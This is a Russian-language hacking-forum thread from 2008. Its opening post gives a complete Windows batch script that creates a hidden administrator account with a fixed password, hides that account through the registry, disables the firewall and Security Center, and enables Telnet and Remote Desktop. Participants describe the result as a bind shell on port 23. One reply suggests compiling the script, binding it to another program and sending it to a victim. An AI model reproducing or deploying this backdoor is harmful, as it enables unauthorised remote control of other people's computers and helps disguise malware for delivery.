Поднятие Telnet сервера на Windows через shell

Discussion in 'Безопасность и Анонимность' started by .:KeepeR:., 5 Apr 2008.

  1. .:KeepeR:.

    .:KeepeR:. Banned

    Joined:
    18 Feb 2008
    Messages:
    25
    Likes Received:
    43
    Reputations:
    0
    Вобсчем столнулся с такой проблемой пару дней назад негде немог и найти ее решения.
    Задачай было поднять telnet какимто скриптом!
    В итоге решение задачи:
    Создаем .bat файл с таким содержанем и запускаем на сервере, в итоге мы получаем поднятый telnet сервак

    HTML:
    Chcp 1251 
    net user Админ 1234 /add > nul 
    net localgroup Администраторы Админ /add > nul 
    net localgroup "Пользователи удаленного рабочего стола" Админ /add > nul 
    cd %systemroot% 
    @echo Windows Registry Editor Version 5.00 > tmp.reg 
    @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> tmp.reg 
    @echo "Админ"=dword:00000000 >> tmp.reg 
    @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >> tmp.reg 
    @echo "forceguest"=dword:00000000 >> tmp.reg 
    @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> tmp.reg 
    @echo "fAllowToGetHelp"=dword:00000000 >> tmp.reg 
    @echo "fDenyTSConnections"=dword:00000000 >> tmp.reg 
    regedit /s %SystemRoot%\tmp.reg /y 
    sc stop wscsvc > nul 
    sc stop SharedAccess > nul 
    sc config wscsvc start= disabled > nul 
    sc config SharedAccess start= disabled > nul 
    sc config tlntsvr start= auto > nul 
    sc config termservice start= auto > nul 
    sc start tlntsvr > nul 
    sc start termservice > nul 
    cd %systemroot% 
    del tmp.reg
     
    1 person likes this.
  2. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Типа бинд-шелл на 23 порту?..
     
  3. .:KeepeR:.

    .:KeepeR:. Banned

    Joined:
    18 Feb 2008
    Messages:
    25
    Likes Received:
    43
    Reputations:
    0
    ага
     
  4. RanDoMix

    RanDoMix New Member

    Joined:
    21 Dec 2007
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    Как вариант: можно закомпилить его Quick Batch File Compiler'ом и склеить с какой-нить прогой. Потом кинуть получившийся файл жертве.
    Скачать можно отсюда - http://soft.mydiv.net/win/download-Quick-Batch-File-Compiler.html
     
  5. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    IMHO, по умолчанию telnet служба отключен. И в батнике сначало надо записывать:
     
  6. .:KeepeR:.

    .:KeepeR:. Banned

    Joined:
    18 Feb 2008
    Messages:
    25
    Likes Received:
    43
    Reputations:
    0
    Ненужно, так как вопервих система непозволит нам стартовать этот сервис, вовторых мы и так включаем службу через реестр